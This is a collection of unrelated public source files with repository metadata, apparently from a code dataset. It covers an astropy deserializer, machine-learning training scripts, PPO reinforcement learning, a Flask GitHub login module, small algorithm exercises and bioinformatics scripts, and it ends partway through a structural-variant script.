933cf8cc4cff1083f9e2d24528c97a94758bc8e0
/astropy/wcs/wcsapi/utils.py
53379b993dc646aa57a45e54f4c0a676d7dfff9e
[ "BSD-3-Clause" ]
permissive
eteq/astropy
e728384624d0c5d497bc5561f303f2a1bc4582ff
6a4f41e22bd8bc6a0031415c771aa8f9d744e34e
refs/heads/staging
2023-09-01T08:51:08.804445
2021-12-07T00:51:15
2021-12-07T00:51:15
2,103,466
1
1
BSD-3-Clause
2018-12-20T19:56:55
2011-07-25T21:02:57
Python
UTF-8
Python
false
false
677
py
import importlib def deserialize_class(tpl, construct=True): """ Deserialize classes recursively. """ if not isinstance(tpl, tuple) or len(tpl) != 3: raise ValueError("Expected a tuple of three values") module, klass = tpl[0].rsplit('.', 1) module = importlib.import_module(module) klass = getattr(module, klass) args = tuple([deserialize_class(arg) if isinstance(arg, tuple) else arg for arg in tpl[1]]) kwargs = dict((key, deserialize_class(val)) if isinstance(val, tuple) else (key, val) for (key, val) in tpl[2].items()) if construct: return klass(*args, **kwargs) else: return klass, args, kwargs
[ "thomas.robitaille@gmail.com" ]
thomas.robitaille@gmail.com
3c6e5cf00966edb4796301a929fbbc97791f5cd9
4d387b596167e6636341bae268b2e582b22d5ff8
/scripts/Meta/Copy_Files.py
86fb8385b7b207de12f8ea0d64c6141be3e8cd91
[]
no_license
tanmayshankar/Visualize_Primitives
f3357b1da95759567bf3abf4bf592cfddef5211e
58f346208cc89265219295ecd5b617e1b8c9dd97
refs/heads/master
2021-01-19T13:52:57.156669
2017-03-26T23:01:58
2017-03-26T23:01:58
82,424,203
0
0
null
null
null
null
UTF-8
Python
false
false
646
py
#!/usr/bin/env python import os import subprocess import sys import shutil import time import signal import numpy as npy # FRCNN_DIR = "/home/tanmay/Code/py-faster-rcnn/tools" # CPM_DIR = "/home/tanmay/Code/Realtime_Multi-Person_Pose_Estimation/testing/python" # INTERP_DIR = "/home/tanmay/Code/Meta_Scripts" IMG_DIR = "/home/tanmay/Code/Grid_Demo/Grid_Demo/" LOC_DIR = "/home/tanmay/catkin_ws/src/Visualize_Primitives/Data/K2_Demos/Grid_Demo" command = "scp tanmay@128.2.194.56:~/Code/Grid_Demo/Grid_Demo/D{0}/Interpolated_Depth_*.png D{0}/" for i in range(1,11): p = subprocess.Popen(command.format(i),shell=True) p.wait() time.sleep(2)
[ "tanmay.shankar@gmail.com" ]
tanmay.shankar@gmail.com
38d791179d75775bfc94f3b94fcadf5825a1ce61
642b7138da231474154a83c2dc3b4a2a42eb441b
/dp/subset_sum_divisible_by_num.py
e26d12eb1e480aa628c9042d7900f4e49be48bc5
[]
no_license
somanshu/python-pr
15465ed7182413591c709f9978420f6a16c9db91
7bfee6fc2a8340ba3e343f991a1da5bdb4ae9cb2
refs/heads/master
2020-07-02T17:21:37.132495
2019-08-22T08:04:11
2019-08-22T08:04:11
201,602,731
0
0
null
null
null
null
UTF-8
Python
false
false
494
py
# Given a set of non-negative distinct integers, and a value m, determine if # there is a subset of the given set with sum divisible by m. def get_subset(s, index, m, currentSum): if currentSum > 0 and currentSum % m == 0: return True if index < 0: return False return get_subset(s, index - 1, m, currentSum) or get_subset(s, index - 1, m, currentSum + s[index]) s = [3, 1, 7, 5] # s = [1, 6] m = 6 # m = 5 index = len(s) - 1 print(get_subset(s, index, m, 0))
[ "somanshu@logos.social" ]
somanshu@logos.social
d3217f0ee0a2b85006978be11d3a0ae29fb0ac17
84a1f9d626828b6ecaee4ef037081f4d8750a990
/编程/程序/十进制转二进制.py
06d8e39924ca9cd5220c784d369d7cdda9e95e6b
[]
no_license
dujiaojingyu/Personal-programming-exercises
5a8f001efa038a0cb3b6d0aa10e06ad2f933fe04
72a432c22b52cae3749e2c18cc4244bd5e831f64
refs/heads/master
2020-03-25T17:36:40.734446
2018-10-01T01:47:36
2018-10-01T01:47:36
143,986,099
1
0
null
null
null
null
UTF-8
Python
false
false
236
py
def Dec2Bin(dec): temp = [] result = ''#字符串 while dec: quo = dec % 2 dec = dec // 2 temp.append(quo) while temp: result += str(temp.pop()) return result print(Dec2Bin(62))
[ "34296128+dujiaojingyu@users.noreply.github.com" ]
34296128+dujiaojingyu@users.noreply.github.com
dc4917189b065071bb39984413668e2ac2c859f5
793913495349a2a53565c9238915ff928995b555
/django-easyvisa/english_page/views.py
a3028e1c80e00cc3317da7ef9721274453469c6d
[]
no_license
Naumov1889/django_easyvisa
48ff9f56569e5950dbb700159c2a4b7515d87413
8c81f9e37ef4c6f44ad1f5aef3d00c136ef7bc40
refs/heads/master
2023-04-09T07:26:38.432411
2021-04-03T09:16:43
2021-04-03T09:16:43
277,068,342
0
0
null
2021-04-03T09:16:44
2020-07-04T08:15:02
JavaScript
UTF-8
Python
false
false
235
py
from django.shortcuts import render from english_page.models import EnglishPrice def english_page(request): prices = EnglishPrice.objects.all().first() return render(request, 'english_page/english.html', {'prices': prices})
[ "144112passgitword" ]
144112passgitword
35e0daa8466311b20ce6fa92c764d84d2f973a23
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
/ml-flask/Lib/site-packages/networkx/generators/tests/test_duplication.py
6f0c7bba2b4170d7128591683cf7b26ad6244ece
[ "MIT" ]
permissive
YaminiHP/SimilitudeApp
8cbde52caec3c19d5fa73508fc005f38f79b8418
005c59894d8788c97be16ec420c0a43aaec99b80
refs/heads/master
2023-06-27T00:03:00.404080
2021-07-25T17:51:27
2021-07-25T17:51:27
389,390,951
0
0
null
null
null
null
UTF-8
Python
false
false
129
py
version https://git-lfs.github.com/spec/v1 oid sha256:99d43639bea0ce795ffc6fcf063a2bc982ee6f2e94b736c4b58c242837a71094 size 1945
[ "yamprakash130@gmail.com" ]
yamprakash130@gmail.com
9406c2bdaf5dddc7a4148100cbd8ef8babd66090
3ee1bb0d0acfa5c412b37365a4564f0df1c093fb
/keras/keras36_hist5_diabets.py
4fabc80b4372746cb9370aec93a29547b2966c07
[]
no_license
moileehyeji/Study
3a20bf0d74e1faec7a2a5981c1c7e7861c08c073
188843c6415a4c546fdf6648400d072359d1a22b
refs/heads/main
2023-04-18T02:30:15.810749
2021-05-04T08:43:53
2021-05-04T08:43:53
324,901,835
3
0
null
null
null
null
UTF-8
Python
false
false
2,406
py
# hist를 이용하여 그래프를 그리시오 # loss, val_loss import numpy as np #1. 데이터 from sklearn.datasets import load_diabetes dataset =load_diabetes() x = dataset.data y = dataset.target print(x.shape) print(y.shape) from sklearn.model_selection import train_test_split x_train, x_test, y_train, y_test = train_test_split(x, y, train_size = 0.8, shuffle = True, random_state = 66) x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size = 0.5, shuffle = False, random_state = 30) #데이터 전처리3 from sklearn.preprocessing import MinMaxScaler scaler = MinMaxScaler() scaler.fit(x_train) x_train = scaler.transform(x_train) x_test = scaler.transform(x_test) x_val = scaler.transform(x_val) #2.모델구성 from tensorflow.keras.models import Sequential, Model from tensorflow.keras.layers import Dense, Input input1 = Input(shape=(10,)) dense = Dense(50, activation='linear')(input1) dense = Dense(90, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(20, activation='linear')(dense) output = Dense(1)(dense) model = Model(inputs=input1, outputs=output) #3. 컴파일, 훈련 from tensorflow.keras.callbacks import EarlyStopping early_stopping = EarlyStopping(monitor='loss', patience=20, mode='auto') model.compile(loss='mse', optimizer='adam', metrics=['mae']) hist = model.fit(x_train, y_train, epochs=2000, batch_size=50, validation_data = (x_val, y_val), callbacks=[early_stopping]) # 그래프 import matplotlib.pyplot as plt plt.plot(hist.history['loss']) plt.plot(hist.history['val_loss']) plt.title('loss') plt.ylabel('epochs') plt.xlabel('loss') plt.legend(['loss', 'val loss']) plt.show() # #4. 
평가, 예측 # loss, mae = model.evaluate(x_test, y_test, batch_size=10) # print('loss, mae : ', loss, mae) # y_predict = model.predict(x_test) # from sklearn.metrics import mean_squared_error, r2_score # def RMSE (y_test, y_predict): # return(np.sqrt(mean_squared_error(y_test, y_predict))) # print('RMSE : ', RMSE(y_test, y_predict)) # print('R2 : ', r2_score(y_test, y_predict))
[ "noreply@github.com" ]
moileehyeji.noreply@github.com
9757613bcff8082143262d20e2291b9e7dc4f47c
3b3585bb12becfe72af03814cec645b0c8e6c779
/satchmo/fulfilment/modules/six/config.py
5843693df8d189a95a02372e005d2daf69ad4a29
[ "BSD-2-Clause" ]
permissive
juderino/jelly-roll
aac548073487511c5b935d9fb20c5a995c665b9b
ccac91bf3aab06fec4f83a7f9eabfa22d41b922a
refs/heads/master
2021-01-18T21:04:15.232998
2015-07-21T20:35:26
2015-07-21T20:35:26
36,597,803
0
0
null
2015-05-31T10:16:21
2015-05-31T10:16:21
null
UTF-8
Python
false
false
1,680
py
from django.utils.translation import ugettext_lazy as _ from satchmo.configuration import ( ConfigurationGroup, config_register_list, StringValue, BooleanValue, ) from satchmo.fulfilment.config import ACTIVE_FULILMENT_HOUSE import logging log = logging.getLogger(__name__) ACTIVE_FULILMENT_HOUSE.add_choice(('satchmo.fulfilment.modules.six', _('Six'))) FULILMENT_HOUSE = ConfigurationGroup( 'satchmo.fulfilment.modules.six', _('Six Fulfilment Settings'), requires=ACTIVE_FULILMENT_HOUSE, ordering=101 ) config_register_list( StringValue( FULILMENT_HOUSE, 'API_KEY', description=_("API Key"), help_text=_("Client's API key, provided by fulfiller."), default=u"" ), BooleanValue( FULILMENT_HOUSE, 'TEST_MODE', description=_("Test mode"), help_text=_("Test identifier, must equal false for order to be processed."), default=True ), StringValue( FULILMENT_HOUSE, 'URL', description=_("API URL"), help_text=_("URL of fulfillers API."), default=u"https://[client].sixworks.co.uk/api/1/" ), BooleanValue( FULILMENT_HOUSE, 'UPDATE_STOCK', description=_("Update Stock"), help_text=_("Update stock based on the fulfilment houses stock levels."), default=True ), BooleanValue( FULILMENT_HOUSE, 'ALLOW_PREORDER', description=_("Allow Preorder"), help_text=_("If true, permits acceptance of orders which contain lines currently out of stock. Disables Out-Of-Stock feedback in API response."), default=False ), )
[ "tony@ynottony.net" ]
tony@ynottony.net
11bcf91fc23f175de6c1f7766a58c9558e8198ab
29f6b4804f06b8aabccd56fd122b54e4d556c59a
/CodeAnalysis/SourceMeter_Interface/SourceMeter-8.2.0-x64-linux/Python/Demo/ceilometer/ceilometer/tests/storage/test_impl_log.py
a12a4c4a5e8878baa8e02622ebde5d5722f131db
[ "Apache-2.0" ]
permissive
obahy/Susereum
6ef6ae331c7c8f91d64177db97e0c344f62783fa
56e20c1777e0c938ac42bd8056f84af9e0b76e46
refs/heads/master
2020-03-27T11:52:28.424277
2018-12-12T02:53:47
2018-12-12T02:53:47
146,511,286
3
2
Apache-2.0
2018-12-05T01:34:17
2018-08-28T21:57:59
HTML
UTF-8
Python
false
false
1,134
py
# # Copyright 2012 New Dream Network, LLC (DreamHost) # # Author: Doug Hellmann <doug.hellmann@dreamhost.com> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for ceilometer/storage/impl_log.py """ from oslotest import base from ceilometer.storage import impl_log class ConnectionTest(base.BaseTestCase): def test_get_connection(self): conn = impl_log.Connection(None) conn.record_metering_data({'counter_name': 'test', 'resource_id': __name__, 'counter_volume': 1, })
[ "abelgomezr45@gmail.com" ]
abelgomezr45@gmail.com
0088554cddbce79223fbc75f4ed10baaafd29148
50de76eb887892c2085e1aa898987962a5d75380
/_8_TensorFlowBasics/Kaggle/MNIST_example/MyVersion.py
303758586192ffed1c2223ce19a995b6a0619cd1
[]
no_license
cyrsis/TensorflowPY36CPU
cac423252e0da98038388cf95a3f0b4e62d1a888
6ada50adf63078ba28464c59808234bca3fcc9b7
refs/heads/master
2023-06-26T06:57:00.836225
2021-01-30T04:37:35
2021-01-30T04:37:35
114,089,170
5
2
null
2023-05-25T17:08:43
2017-12-13T07:33:57
Jupyter Notebook
UTF-8
Python
false
false
3,555
py
import pandas as pd import numpy as np import matplotlib.pyplot as plt import matplotlib.image as mpimg import seaborn as sns np.random.seed(2) from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix import itertools from keras.utils.np_utils import to_categorical # convert to one-hot-encoding from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D from keras.optimizers import Adam , RMSprop from keras.preprocessing.image import ImageDataGenerator from keras.callbacks import ReduceLROnPlateau train_data = pd.read_csv("train.csv") test = pd.read_csv("test.csv") X_train = train_data.drop("label", axis=1) Y_train = train_data["label"] X_train.isnull().any().describe() test.isnull().any().describe() # normalize the data X_train = X_train / 255.0 test = test / 255.0 X_train = X_train.values.reshape(-1, 28, 28, 1) test = test.values.reshape(-1, 28, 28, 1) # one_hot on y Y_train = to_categorical(Y_train, num_classes=10) # Splite the data into 2 random_seed = 2 X_train, X_value, Y_train, Y_value = train_test_split(X_train, Y_train, test_size=0.2, random_state=random_seed) g = plt.imshow(X_train[0][:, :, 0]) # Layer 1 = 2Conv 1 Max 1 Dropout model = Sequential() model.add(Conv2D(filters=32, kernel_size=(5, 5), padding='same', activation='relu', input_shape=(28, 28, 1))) model.add(Conv2D(filters=32, kernel_size=(5, 5), padding='same', activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.25)) # layer 2 = 2Conv 1 Max 1 Dropout model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same', activation='relu')) model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same', activation='relu')) model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(10, activation="softmax")) model.summary() optimizer = Adam(lr=0.001) 
model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"]) epochs = 8000 batch_size = 100 datagen = ImageDataGenerator( featurewise_center=False, # set input mean to 0 over the dataset samplewise_center=False, # set each sample mean to 0 featurewise_std_normalization=False, # divide inputs by std of the dataset samplewise_std_normalization=False, # divide each input by its std zca_whitening=False, # apply ZCA whitening rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180) zoom_range=0.1, # Randomly zoom image width_shift_range=0.1, # randomly shift images horizontally (fraction of total width) height_shift_range=0.1, # randomly shift images vertically (fraction of total height) horizontal_flip=False, # randomly flip images vertical_flip=False) # randomly flip images datagen.fit(X_train) learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc', patience=3, verbose=1, factor=0.5, min_lr=0.00001) history = model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size), epochs=epochs, validation_data=(X_value, Y_value), verbose=2, steps_per_epoch=X_train.shape[0] // batch_size , callbacks=[learning_rate_reduction]) model.save('kaggleMnist.h5')
[ "em3888@gmail.com" ]
em3888@gmail.com
631df51128d1ead7ea74a4165ad84d1ae6ba2c21
113b962bd5e2eb770067bd374a15dfe8a1c2d09f
/py_scripts/ALC_Classify_mem.py
ac329f05c8175852db002aa7f765e64b208a2500
[]
no_license
aungthurhahein/biotech_script
ecce51950bcef69405843da12ece2f84ea5541d6
2fda699343e6c46543fa1df2412c8ca2f2622cda
refs/heads/master
2020-12-24T06:20:13.028141
2016-07-06T15:23:34
2016-07-06T15:23:34
25,574,741
5
0
null
null
null
null
UTF-8
Python
false
false
1,280
py
#! /usr/bin/env/ python """ # # usage: # output: # Dev: __author__ = 'aung' # Date: """ import sys A_id = sys.argv[1] # A L_id = sys.argv[2] # L C_id = sys.argv[3] # C Cu_id = sys.argv[4] # C Unmap cluster_file = sys.argv[5] # cluster parsed file open_Aid = open(A_id, 'r') open_Lid = open(L_id, 'r') open_Cid = open(C_id, 'r') open_Cuid = open(Cu_id, 'r') open_cluster = open(cluster_file, 'r') A_id_list = [] L_id_list = [] C_id_list = [] Cu_id_list = [] clst_list = [] for id1 in open_Aid: A_id_list.append(id1.strip()) for id2 in open_Lid: L_id_list.append(id2.strip()) for id3 in open_Cid: C_id_list.append(id3.strip()) for id4 in open_Cuid: Cu_id_list.append(id4.strip()) for cluster in open_cluster: clst_list.append(cluster.strip()) for x in clst_list: x_split = x.split('\t') A_count = 0 L_count = 0 C_count = 0 Cu_count = 0 for mem in x_split[1:]: if mem.strip() in A_id_list: A_count += 1 elif mem.strip() in L_id_list: L_count += 1 elif mem.strip() in C_id_list: C_count += 1 elif mem.strip() in Cu_id_list: Cu_count += 1 print x_split[0] + '\t' + str(A_count) +'\t' + str(L_count) +'\t' + str(C_count) +'\t' + str(Cu_count)
[ "aungthurhahein@gmail.com" ]
aungthurhahein@gmail.com
068c7cd5bd637d350ce9bd048c76e37c66724ddc
84617010027b08e65412b0e187bc0612a59cfbc7
/nomenklatura/views/sessions.py
52b22af40c4de8eb7066b51ea550ebcf98409300
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
gabelula/nomenklatura
16d52def8bb1c0dbc5a6aa386336366de31ffd79
eae335a44ef6bb08728083d4d10386f3a9e16def
refs/heads/master
2020-12-02T15:07:10.350344
2013-12-02T11:35:02
2013-12-02T11:35:02
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,968
py
import requests from flask import url_for, session, Blueprint, redirect from flask import request from flask.ext.utils.serialization import jsonify from nomenklatura import authz from nomenklatura.core import db, github from nomenklatura.model import Account, Dataset section = Blueprint('sessions', __name__) @section.route('/sessions') def status(): return jsonify({ 'logged_in': authz.logged_in(), 'api_key': request.account.api_key if authz.logged_in() else None, 'account': request.account }) @section.route('/sessions/authz') def get_authz(): permissions = {} dataset_name = request.args.get('dataset') if dataset_name is not None: dataset = Dataset.find(dataset_name) permissions[dataset_name] = { 'view': True, 'edit': authz.dataset_edit(dataset), 'manage': authz.dataset_manage(dataset) } return jsonify(permissions) @section.route('/sessions/login') def login(): callback=url_for('sessions.authorized', _external=True) return github.authorize(callback=callback) @section.route('/sessions/logout') def logout(): authz.require(authz.logged_in()) session.clear() #flash("You've been logged out.", "success") return redirect(url_for('index')) @section.route('/sessions/callback') @github.authorized_handler def authorized(resp): if not 'access_token' in resp: return redirect(url_for('index')) access_token = resp['access_token'] session['access_token'] = access_token, '' res = requests.get('https://api.github.com/user?access_token=%s' % access_token, verify=False) data = res.json() for k, v in data.items(): session[k] = v account = Account.by_github_id(data.get('id')) if account is None: account = Account.create(data) db.session.commit() #flash("Welcome back, %s." % account.login, "success") return redirect(url_for('index'))
[ "friedrich@pudo.org" ]
friedrich@pudo.org
2208cbadde363d62f16946fc23a172732d054aa5
b54eb04ec2de1dec11a7143c6b5049a1d031ddaf
/test/baselines/ppo1/pposgd_simple.py
8f4c641bc5bc34fd88a1303b2e9a5e4e895fff54
[]
no_license
Jerryxiaoyu/CR_CPG_RL
78c4c6e7539f08465b1f55125e04f982b1323bf2
69213cc48440ea66c42fbe3ace35163174686321
refs/heads/master
2020-03-28T12:11:51.491796
2018-09-14T04:32:33
2018-09-14T04:32:33
148,277,281
0
0
null
null
null
null
UTF-8
Python
false
false
9,514
py
from test.baselines.common import Dataset, explained_variance, fmt_row, zipsame from test.baselines import logger import test.baselines.common.tf_util as U import tensorflow as tf, numpy as np import time from test.baselines.common.mpi_adam import MpiAdam from test.baselines.common.mpi_moments import mpi_moments from mpi4py import MPI from collections import deque def traj_segment_generator(pi, env, horizon, stochastic): t = 0 ac = env.action_space.sample() # not used, just so we have the datatype new = True # marks if we're on first timestep of an episode ob = env.reset() cur_ep_ret = 0 # return in current episode cur_ep_len = 0 # len of current episode ep_rets = [] # returns of completed episodes in this segment ep_lens = [] # lengths of ... # Initialize history arrays obs = np.array([ob for _ in range(horizon)]) rews = np.zeros(horizon, 'float32') vpreds = np.zeros(horizon, 'float32') news = np.zeros(horizon, 'int32') acs = np.array([ac for _ in range(horizon)]) prevacs = acs.copy() while True: prevac = ac ac, vpred = pi.act(stochastic, ob) # Slight weirdness here because we need value function at time T # before returning segment [0, T-1] so we get the correct # terminal value if t > 0 and t % horizon == 0: yield {"ob" : obs, "rew" : rews, "vpred" : vpreds, "new" : news, "ac" : acs, "prevac" : prevacs, "nextvpred": vpred * (1 - new), "ep_rets" : ep_rets, "ep_lens" : ep_lens} # Be careful!!! 
if you change the downstream algorithm to aggregate # several of these batches, then be sure to do a deepcopy ep_rets = [] ep_lens = [] i = t % horizon obs[i] = ob vpreds[i] = vpred news[i] = new acs[i] = ac prevacs[i] = prevac ob, rew, new, _ = env.step(ac) rews[i] = rew cur_ep_ret += rew cur_ep_len += 1 if new: ep_rets.append(cur_ep_ret) ep_lens.append(cur_ep_len) cur_ep_ret = 0 cur_ep_len = 0 ob = env.reset() t += 1 def add_vtarg_and_adv(seg, gamma, lam): """ Compute target value using TD(lambda) estimator, and advantage with GAE(lambda) """ new = np.append(seg["new"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1 vpred = np.append(seg["vpred"], seg["nextvpred"]) T = len(seg["rew"]) seg["adv"] = gaelam = np.empty(T, 'float32') rew = seg["rew"] lastgaelam = 0 for t in reversed(range(T)): nonterminal = 1-new[t+1] delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t] gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam seg["tdlamret"] = seg["adv"] + seg["vpred"] def learn(env, policy_fn, *, timesteps_per_actorbatch, # timesteps per actor per update clip_param, entcoeff, # clipping parameter epsilon, entropy coeff optim_epochs, optim_stepsize, optim_batchsize,# optimization hypers gamma, lam, # advantage estimation max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint callback=None, # you can do anything in the callback, since it takes locals(), globals() adam_epsilon=1e-5, schedule='constant' # annealing for stepsize parameters (epsilon and adam) ): # Setup losses and stuff # ---------------------------------------- ob_space = env.observation_space ac_space = env.action_space pi = policy_fn("pi", ob_space, ac_space) # Construct network for new policy oldpi = policy_fn("oldpi", ob_space, ac_space) # Network for old policy atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable) ret = tf.placeholder(dtype=tf.float32, shape=[None]) # 
Empirical return lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule clip_param = clip_param * lrmult # Annealed cliping parameter epislon ob = U.get_placeholder_cached(name="ob") ac = pi.pdtype.sample_placeholder([None]) kloldnew = oldpi.pd.kl(pi.pd) ent = pi.pd.entropy() meankl = tf.reduce_mean(kloldnew) meanent = tf.reduce_mean(ent) pol_entpen = (-entcoeff) * meanent ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold surr1 = ratio * atarg # surrogate from conservative policy iteration surr2 = tf.clip_by_value(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg # pol_surr = - tf.reduce_mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP) vf_loss = tf.reduce_mean(tf.square(pi.vpred - ret)) total_loss = pol_surr + pol_entpen + vf_loss losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent] loss_names = ["pol_surr", "pol_entpen", "vf_loss", "kl", "ent"] var_list = pi.get_trainable_variables() lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)]) adam = MpiAdam(var_list, epsilon=adam_epsilon) assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv) for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())]) compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses) U.initialize() adam.sync() # Prepare for rollouts # ---------------------------------------- seg_gen = traj_segment_generator(pi, env, timesteps_per_actorbatch, stochastic=True) episodes_so_far = 0 timesteps_so_far = 0 iters_so_far = 0 tstart = time.time() lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, "Only one time constraint permitted" while True: if callback: callback(locals(), globals()) if max_timesteps and timesteps_so_far >= max_timesteps: break elif max_episodes 
and episodes_so_far >= max_episodes: break elif max_iters and iters_so_far >= max_iters: break elif max_seconds and time.time() - tstart >= max_seconds: break if schedule == 'constant': cur_lrmult = 1.0 elif schedule == 'linear': cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0) else: raise NotImplementedError logger.log("********** Iteration %i ************"%iters_so_far) seg = seg_gen.__next__() add_vtarg_and_adv(seg, gamma, lam) # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets)) ob, ac, atarg, tdlamret = seg["ob"], seg["ac"], seg["adv"], seg["tdlamret"] vpredbefore = seg["vpred"] # predicted value function before udpate atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=not pi.recurrent) optim_batchsize = optim_batchsize or ob.shape[0] if hasattr(pi, "ob_rms"): pi.ob_rms.update(ob) # update running mean/std for policy assign_old_eq_new() # set old parameter values to new parameter values logger.log("Optimizing...") logger.log(fmt_row(13, loss_names)) # Here we do a bunch of optimization epochs over the data for _ in range(optim_epochs): losses = [] # list of tuples, each of which gives the loss for a minibatch for batch in d.iterate_once(optim_batchsize): *newlosses, g = lossandgrad(batch["ob"], batch["ac"], batch["atarg"], batch["vtarg"], cur_lrmult) adam.update(g, optim_stepsize * cur_lrmult) losses.append(newlosses) logger.log(fmt_row(13, np.mean(losses, axis=0))) logger.log("Evaluating losses...") losses = [] for batch in d.iterate_once(optim_batchsize): newlosses = compute_losses(batch["ob"], batch["ac"], batch["atarg"], batch["vtarg"], cur_lrmult) losses.append(newlosses) meanlosses,_,_ = mpi_moments(losses, axis=0) logger.log(fmt_row(13, meanlosses)) for (lossval, name) in zipsame(meanlosses, loss_names): logger.record_tabular("loss_"+name, lossval) logger.record_tabular("ev_tdlam_before", 
explained_variance(vpredbefore, tdlamret)) lrlocal = (seg["ep_lens"], seg["ep_rets"]) # local values listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples lens, rews = map(flatten_lists, zip(*listoflrpairs)) lenbuffer.extend(lens) rewbuffer.extend(rews) logger.record_tabular("EpLenMean", np.mean(lenbuffer)) logger.record_tabular("EpRewMean", np.mean(rewbuffer)) logger.record_tabular("EpThisIter", len(lens)) episodes_so_far += len(lens) timesteps_so_far += sum(lens) iters_so_far += 1 logger.record_tabular("EpisodesSoFar", episodes_so_far) logger.record_tabular("TimestepsSoFar", timesteps_so_far) logger.record_tabular("TimeElapsed", time.time() - tstart) if MPI.COMM_WORLD.Get_rank()==0: logger.dump_tabular() def flatten_lists(listoflists): return [el for list_ in listoflists for el in list_]
[ "drl@wjy.com" ]
drl@wjy.com
c71e76456021d181e3109d58483b2b6cb52826cc
811e4542f6728e2f3de98fc227f9f4a111d4eb1e
/templates/topics/math/factorization.py
4c5332d9ce120a59f4ac95ff1464c5f004608320
[]
no_license
Alfred-Walker/ppst
ab2902f04a73048f73b50d3c79d9e80cd257a985
8685d0ca7e89be34372a7d2673e21abb77bb3778
refs/heads/master
2021-01-04T05:07:08.813035
2020-02-19T02:35:07
2020-02-19T02:35:07
240,400,000
0
0
null
null
null
null
UTF-8
Python
false
false
816
py
"""factorization examples""" class PrimeFactorization: @staticmethod def factorization(number): ret = [] for i in range(2, int(number ** 0.5) + 1): while number % i == 0: ret.append(i) number //= i if number > 1: ret.append(number) return ret prime_factors = PrimeFactorization.factorization(32) print(prime_factors) # >>> [2, 2, 2, 2, 2] prime_factors = PrimeFactorization.factorization(15) print(prime_factors) # >>> [3, 5] class Practice: @staticmethod def factorization(num): ret = [] for i in range(2, int(num ** 0.5) + 1): while num % i == 0: ret.append(i) num //= i if num >= 2: ret.append(num) return ret
[ "studio.alfred.walker@gmail.com" ]
studio.alfred.walker@gmail.com
52460ba2ae00e285614d14e7ba0f7598278c93fb
406bf29e4cfc59bc2cc6005813e4a63065c642bb
/jhyouk_universal_filter/13_SV/Delly_annotation_scripts/06.07.count_frag_find_newBP.py
c222cee64e94a9ee3a7e529a296aa1a6b0011040
[]
no_license
leehs96/Emergency_backup
630c5efbe17f3175851ee80ef6dde72f5f613fe7
9bc30b7a5eda03ac207b16f83d93559a5637ac19
refs/heads/main
2023-02-10T11:43:40.172101
2021-01-05T06:10:33
2021-01-05T06:10:33
326,903,545
0
0
null
null
null
null
UTF-8
Python
false
false
18,062
py
#Arg1: sv file #Arg2: tumor bam #Arg3: normal bam #190226 line427 change '=' inserted import sys,pysam, collections, itertools print('### SVvaf new BP') print(sys.argv[1]) sv_file=open(sys.argv[1]) #CHR1 POS1 CHR2 POS2 MH Terminal SVtype t_file=pysam.AlignmentFile(sys.argv[2],'rb') #Cancer bam n_file=pysam.AlignmentFile(sys.argv[3],'rb') #Normal bam out_file=open(sys.argv[1]+'.SVvaf','w') fors=700; bacs=5 # search range for pairread counting # You can adjust these values. iscut=700 # insert size cut for call reference pair # You can adjust this value. shortDco=500 sc_co=5 # number of bases which is used to differentiate discordant soft-clipping sv_line=sv_file.readline().strip() #Assign the column number starting from 1 c_chr1=15 c_pos1=16 c_chr2=17 c_pos2=18 c_ter=20 # e.g. 3to5, 5to3, 3to3, etc. c_type=21 # e.g. DEL, TRA, DUP, INV c_chr1 -=1;c_pos1-=1;c_chr2-=1;c_pos2-=1;c_ter-=1;c_type-=1 def make_cigartuple(cigarstring): cg_num=len(cigarstring) lt='' 